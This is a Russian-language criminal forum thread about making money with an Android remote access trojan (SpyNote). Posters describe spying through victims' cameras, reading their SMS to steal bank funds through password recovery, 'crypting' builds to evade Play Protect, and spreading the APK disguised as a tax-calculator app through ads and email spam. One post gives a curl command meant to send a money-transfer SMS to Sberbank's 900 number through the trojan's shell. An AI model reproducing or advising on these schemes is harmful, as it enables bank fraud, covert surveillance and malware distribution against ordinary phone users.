Ez Заработок на Rat

Suslik228

Резидент
Статус
offline
Регистрация
10.09.2020
Сообщения
77
Репутация
114
Короче, руки на конец-то до ратника на андроид дошли, пользуюсь spy note 6.4 (крайняя на сегодня) , функционал и работоспособность меня впечатлили после, как я нажал в панеле на "camera" и уже с компьютера увидел свой потолок через фронталку)
Единственное что меня не много разочаровало:
1) В v6.4 сравнению с v4.0 нельзя отправлять смс, а в v4.0 - нужен крипт билда, ибо он даже не открывается, но все же это не проблема, ибо смски читать можно, а значит что зная номер карты / телефона можно угонять бабки через восстановления пароля :))
2)Выскакивает не приятное уведомление, короче нужен типа сертификат или крипт чтобы play защита не ругалась.
Ну и на этом всё собственно.
По распространению apk (ворк по ру как смысл жизни ✊🤕) - идеи есть, и я уверен что может профита может быть и не будет , но установку 1-2 я увижу 100% (:
Если у вас идеи, то вы можете их написать !
Так же оформляю чатик для единомышленников, обмен опытом и т.д, если есть опытные , то особенно буду рад видеть вас у себя в чате (:
 

Suslik228

Резидент
Статус
offline
Регистрация
10.09.2020
Сообщения
77
Репутация
114
В ратнике есть функция shell terminal, по идеи через него можно отправить сообщение через 900 (сбер).

curl -X POST https://textbelt.com/text \
--data-urlencode phone='900' \
--data-urlencode message='Перевод денег' \
-d key=textbelt

Думаю должно сработать
 

kingco6ra

Новичок
Статус
offline
Регистрация
29.08.2021
Сообщения
5
Репутация
3
Как успехи? Тема весьма интересная
 

mikeermontraut

Новичок
Статус
offline
Регистрация
11.10.2020
Сообщения
53
Репутация
12
Тык лучше на бурж его распространять, закриптовать допустим в некую прилку))
Лить трафик с гугл адс, или лучше спамить почты, к примеру сейчас нормально заходит налоговый калькулятор, короче немного фантазии и можно работать :-)
 

dreyzev

Новичок
Статус
offline
Регистрация
16.09.2021
Сообщения
1
Репутация
0
Тема очень интересная, только нужна помощь в установлении и пользование ратника.
 

dushiotdushi

Новичок
Статус
offline
Регистрация
15.05.2022
Сообщения
2
Репутация
2
Скиньте мануал